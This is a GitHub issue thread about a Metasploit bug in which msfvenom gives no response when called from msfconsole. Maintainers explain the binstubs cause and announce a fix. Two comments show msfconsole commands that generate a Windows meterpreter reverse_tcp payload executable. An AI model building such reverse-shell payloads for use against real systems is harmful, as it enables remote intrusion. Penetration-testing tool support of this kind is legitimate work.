### ISSUE TITLE
Msf* Commands Still Don't Work on Msfconsole

### ISSUE THREAD

**Issue by zmajevi** [rapid7/metasploit-framework#6444]
This time i tried installing metasploit like it says on this link:
https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

and i still can't get a respond when i type in an msf command on msfconsole.
I already tried installing Ubuntu again and it still doesn't work. I am using Ubuntu 15.10 version by the way.

This is what happens when i type in msfvenom for example:

msf > msfvenom
[*] exec: msfvenom

msf >

**Comment by bcook-r7** [comment]
Why would you do that than just typing 'msfvenom' from the normal command line?  Yes, this is because of the binstubs issue, the PR is ready for merging soon.

But I'm really not sure what problem are you trying to solve by running msfvenom from within msfconsole.

**Comment by zmajevi** [comment]
I have just ran it to show an example if i try to load a payload for instance it still doesnt respond.

**Comment by wchen-r7** [comment]
@zmajevi If you call msfvenom from the msf prompt, it would be treated as an external process. To generate a payload in msfconsole, here's how you can do it:

```
msf > use payload/windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set lhost 192.168.1.199
lhost => 192.168.1.199
msf payload(reverse_tcp) > generate -t exe -f /tmp/test.exe
[*] Writing 73802 bytes to /tmp/test.exe...
msf payload(reverse_tcp) > 
```

**Comment by bcook-r7** [comment]
The next build should resolve that particular issue (will be done in a few minutes). Still, I'd recommend running msfvenom like this:

```
msf > exit
$ msfvenom
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /opt/metasploit-framework/bin/../embedded/framework/msfvenom [options] <var=val>
...
```

If you actually want to generate a payload from within framework, this is more efficient than shelling out to msfvenom
```
msf > use payload/windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf payload(reverse_tcp) > generate -f test.exe -t exe
[*] Writing 73802 bytes to test.exe...
```

**Comment by zmajevi** [comment]
Allright thanks for the help guys.

**Comment by bcook-r7** [comment]
OK, the fix is in the latest build as well.
